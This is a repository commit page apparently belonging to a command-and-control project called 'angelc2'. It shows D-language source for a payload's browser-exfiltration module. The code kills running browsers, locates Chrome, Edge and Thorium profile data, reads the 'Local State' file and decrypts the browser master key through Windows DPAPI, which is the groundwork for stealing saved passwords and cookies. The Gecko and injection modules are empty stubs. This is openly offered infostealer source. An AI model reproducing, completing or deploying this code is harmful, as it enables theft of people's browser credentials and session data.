serpent256/angelc2
SHA256
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initiliazation

Browse Source
This commit is contained in:
unknown
2025-12-22 16:23:48 +01:00
parent 7a8b6d451d
commit b29e6179f3
165 changed files with 28070 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

64
full/Angel-payload/angel/exfil/browser/browser.d Normal file
View File

@@ -0,0 +1,64 @@
module angel.exfil.browser.browser;
// Internal imports
import angel.utils.logging;
import angel.utils.utils;
import angel.config : config;
import angel.utils.constants;
import angel.exfil.browser.inject;
import angel.exfil.browser.chromium.chromium;
import angel.exfil.browser.gecko.gecko;
// External imports
import std.path;
import std.stdio;
import std.file;
import core.thread.osthread;
// TODO fix process killing
// BUG doesn't equally loop through set of procs, just operates on last one
class Browser {
this() {
Logger.log(LogLevel.Event, "Initializing browser...");
string[] procs = ["firefox.exe", "chrome.exe", "msedge.exe"];
if (!config.debug_mode) {
Utils.killproc(procs);
}
string browser_path = buildPath(Constants.workdir, "Browser");
if (!exists(browser_path)) {
mkdir(browser_path);
}
Logger.log(LogLevel.Event, "Initialized browser.");
}
public void run() {
Thread[] threads;
if (config.exfil.browser.gecko) {
auto t = new Thread(() => new Gecko().entry());
threads ~= t;
Logger.log(LogLevel.Event, "Running thread gecko...");
t.start();
}
else if (config.exfil.browser.chromium) {
auto t = new Thread(() => new Chromium().entry());
threads ~= t;
Logger.log(LogLevel.Event, "Running thread chromium...");
t.start();
} else if (config.exfil.browser.inject) {
auto t = new Thread(() => new Inject().inject());
threads ~= t;
Logger.log(LogLevel.Event, "Running thread browser inject...");
t.start();
}
foreach (t; threads) {
joinLowLevelThread(t.id);
}
}
}

77
full/Angel-payload/angel/exfil/browser/chromium/chromium.d Normal file
View File

@@ -0,0 +1,77 @@
module angel.exfil.browser.chromium.chromium;
// Internal imports
import angel.utils.constants;
import angel.utils.logging;
import angel.exfil.browser.chromium.dpapi;
// External imports
import std.stdio;
import std.string;
import std.file;
import std.base64;
import std.Path;
import std.format;
import std.json;
class Chromium {
private {
string localst;
string[] profs = ["Default", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5"];
string[] paths = ["Microsoft\\Edge", "Thorium", "Google\\Chrome"];
}
public void entry() {
Logger.log(LogLevel.Debug, "Entered chromium");
foreach (path; paths) {
string pat = buildPath(Constants.local_appdata, path, "User Data");
if (exists(pat)) {
Logger.log(LogLevel.Debug, format("Browser dir %s exists", pat));
this.localst = buildPath(pat, "Local State");
if (exists(localst)) {
Logger.log(LogLevel.Debug, format("Local State file %s exists for browser %s", localst, pat));
ubyte[] master_key = this.mkey();
if (master_key is null || master_key.length == 0) {
Logger.log(
LogLevel.Debug,
"Master key contains 0 bytes, possible uncaught/unknown error. Skipping..."
);
Logger.log(LogLevel.Debug, format("%s", master_key));
return;
} else {
Logger.log(LogLevel.Debug, format("Decrypted master key: %s", master_key));
}
foreach(prof; profs) {
string profpat = buildPath(pat, prof);
if (exists(profpat)) {
Logger.log(LogLevel.Debug, format("Profile %s exists for browser %s", prof, pat));
}
}
}
}
}
}
private ubyte[] mkey() {
string bjson = readText(this.localst);
JSONValue json = parseJSON(bjson);
string encoded = json["os_crypt"]["encrypted_key"].str;
ubyte[] bdecoded = Base64.decode(encoded.strip());
ubyte[] bkey_crypt = bdecoded[5 .. $];
ubyte[] dat = dpapi(bkey_crypt);
return dat;
}
}

46
full/Angel-payload/angel/exfil/browser/chromium/dpapi.d Normal file
View File

@@ -0,0 +1,46 @@
module angel.exfil.browser.chromium.dpapi;
// Internal imports
import angel.utils.logging;
// External imports
import core.sys.windows.windows;
import core.stdc.stdlib;
import std.string;
extern(Windows)
{
BOOL CryptUnprotectData(
const(DATA_BLOB)* pDataIn,
LPCWSTR* ppszDataDescr,
const(DATA_BLOB)* pOptionalEntropy,
void* pvReserved,
void* pPromptStruct,
uint dwFlags,
DATA_BLOB* pDataOut
);
}
extern(Windows)
struct DATA_BLOB
{
uint cbData;
ubyte* pbData;
}
ubyte[] dpapi(ubyte[] key_crypt) {
DATA_BLOB inBlob;
DATA_BLOB outBlob;
inBlob.pbData = key_crypt.ptr;
inBlob.cbData = cast(uint) key_crypt.length;
if (CryptUnprotectData(&inBlob, null, null, null, null, 0, &outBlob)) {
ubyte[] decrypted = cast(ubyte[])(outBlob.pbData[0 .. outBlob.cbData]).idup;
free(outBlob.pbData);
return decrypted;
} else {
return [];
}
}

2
full/Angel-payload/angel/exfil/browser/chromium/inject.d Normal file
View File

@@ -0,0 +1,2 @@
module angel.exfil.browser.chromium.inject;

20
full/Angel-payload/angel/exfil/browser/gecko/gecko.d Normal file
View File

@@ -0,0 +1,20 @@
module angel.exfil.browser.gecko.gecko;
// Internal imports
import angel.utils.logging;
// External imports
import std.stdio;
class Gecko {
this() {
}
private {
}
public void entry() {
Logger.log(LogLevel.Debug, "Entered gecko");
}
}

2
full/Angel-payload/angel/exfil/browser/gecko/inject.d Normal file
View File

@@ -0,0 +1,2 @@
module angel.exfil.browser.gecko.injection;

15
full/Angel-payload/angel/exfil/browser/inject.d Normal file
View File

@@ -0,0 +1,15 @@
module angel.exfil.browser.inject;
class Inject {
this() {
}
private {
}
void inject() {
}
}